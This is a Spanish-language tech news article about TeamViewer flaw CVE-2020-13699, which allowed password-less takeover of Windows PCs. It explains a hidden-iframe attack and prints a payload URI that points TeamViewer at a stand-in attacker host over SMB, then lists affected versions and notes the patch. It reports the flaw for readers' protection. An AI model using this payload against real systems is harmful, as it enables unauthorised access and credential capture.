Secciones
TeamViewer reporta vulnerabilidad que cede el control de las PC sin contraseña
Tecnología

TeamViewer reporta vulnerabilidad que cede el control de las PC sin contraseña

Una nueva vulnerabilidad descubierta en TeamViewer, permitía tomar control de PCs sin requerir contraseña para conectarse

por LaVerdad

TeamViewer reporta vulnerabilidad que cede el control de las PC sin contraseña

TeamViewer reporta vulnerabilidad que cede el control de las PC sin contraseña

Actualmente existen muchas herramientas para conectarnos remotamente a otros dispositivos, algo que se ha hecho muy normal, sobre todo en estos tiempos en que el distanciamiento social es tan importante; las noticias de hoy nos remiten a TeamViewer, el popular software que ahora y sin querer, pone en riesgo a los usuarios que lo utilizan. 

Esta vulnerabilidad dn TeamViewer permite a un atacante tener acceso a un dispositivo sin la necesidad de ingresar la contraseña de conexión. El equipo de TeamViewer se apresuró para liberar un parche que permitiera corregir esta grave vulnerabilidad, la cual ha sido registrada como CVE-2020-13699 y ha sido categorizada de alta gravedad.

Usualmente los ataques que aprovechan este tipo de vulnerabilidad llegan por medio de páginas maliciosas, las cuales cargan algún iframe en el navegador, puede ser que esté oculto o que sea tan pequeño como un píxel, lo que evita que el usuario pueda detectarlo. 

Teamviewer ya liberó el parche que corrige la vulnerabilidad
Teamviewer ya liberó el parche que corrige la vulnerabilidad

Posteriormente el iframe se carga a sí mismo utilizando el esquema de URI teamviewer10:, el cual le indica al navegador que inicie la app TeamViewer previamente instalada en el equipo. Estos esquemas de URL personalizados son utilizados por apps instaladas localmente y que permiten al usuario iniciarlos desde su navegador.

Después el atacante establecerá el atributo src del iframe en ‘teamviewer10: –play \ attacker-IP share fake.tvs’, comando con el que indica a la app de TeamViewer que está instalada se conecte al servidor del atacante por medio del protocolo SMB, por lo que el atacante no requerirá la contraseña del usuario.

TE PUEDE INTERESAR: Microsoft advierte sobre vulnerabilidad crítica del servidor DNS de Windows

TeamViewer indicó que este problema afectaba a diversas versiones de su software para Windows, específicamente a 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 y 15.8.3, la buena noticia es que se pusieron manos a la obra y  liberaron el parche necesario para todas ellas.

Temas

Comentarios